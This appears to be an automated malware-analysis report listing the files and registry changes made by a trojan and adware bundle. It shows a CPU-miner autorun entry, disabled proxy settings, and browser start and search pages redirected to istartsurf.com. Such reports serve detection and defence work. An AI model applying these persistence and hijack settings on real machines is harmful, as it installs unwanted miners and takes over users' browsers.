C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
%Program Files% (x86)\is383871.log (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE (6223 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS (5796 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)
Registry activity
The process ProtectService.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Wow6432Node\IHProtect]
"ptid" = "pcm"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"
The process ProtectService.exe:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"
The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "C4 83 39 63 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process ProtectWindowsManager.exe:3736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "7D 6C C9 96 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process ProtectWindowsManager.exe:3316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\services\eventlog\Application\WindowsMangerProtect]
"EventMessageFile" = "C:\ProgramData\WindowsMangerPro￿Â"
"TypesSupported" = "7"
The process 15094FED_stp.EXE:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"Publisher" = "DesprotetorINC"
"DisplayVersion" = "1.0"
"DisplayName" = "DesProtetor"
[HKLM\SOFTWARE\DesProtetor]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"UninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"
"Comments" = "Tenha acesso direto aos links sem passar por nenhum protetor de Links ou publicidades"
"QuietUninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"
The process cpuminer-x11opt-setup.exe:3752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"InstallLocation" = "C:\Windows\system32"
"DisplayName" = "CPU Miner"
"Publisher" = "Open Source"
"DisplayIcon" = "C:\Windows\system32\cpuminer-gw64.exe"
"EstimatedSize" = "1316"
"DisplayVersion" = "1.1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"
The process DesProtetor.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "13 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process wpm_v20.0.0.2227.exe:3268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\supWindowsMangerProtect]
"ptid" = "pcm"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayVersion" = "1.2.0"
"DisplayName" = "ActSys"
[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Publisher" = "NINJASOFT LLC"
"QuietUninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: CWxGaP3QbYgwfMaFKJSDGrZa)"
The process QQBrowser.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process QQBrowser.exe:3212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Mozilla\Extends]
"AppID" = "quick_searchff@gmail.com"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%windir%\System32]
"ie4uinit.exe"",-738" = "Start Internet Explorer without ActiveX controls or browser extensions."
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"Publisher" = "istartsurf"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
"(Default)" = "%Program Files% (x86)\Mozilla Firefox\firefox.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"
"Time" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%systemroot%\system32\windowspowershell\v1.0]
"powershell.exe"",-111" = "Performs object-based (command-line) functions"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
"(Default)" = "%Program Files% (x86)\Google\Chrome\Application\chrome.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Mozilla\Extends]
"UID" = "535559167_198339_B48A115F"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
"DisplayName" = "istartsurf"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Mozilla\Extends]
"ptid" = "pcm"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayName" = "istartsurf uninstall"
[HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions]
"quick_searchff@gmail.com" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\quick_searchff@gmail.com"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe -ptid=pcm"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"UninstallString" = "%Program Files% (x86)\WNet\uninst.exe"
[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: aGf9F1GWmcyPdxOIFdIm7cfc)"
"QuietUninstallString" = "%Program Files% (x86)\WNet\uninst.exe"
"DisplayVersion" = "1.0"
The process %original file name%.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "35 BC BD 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
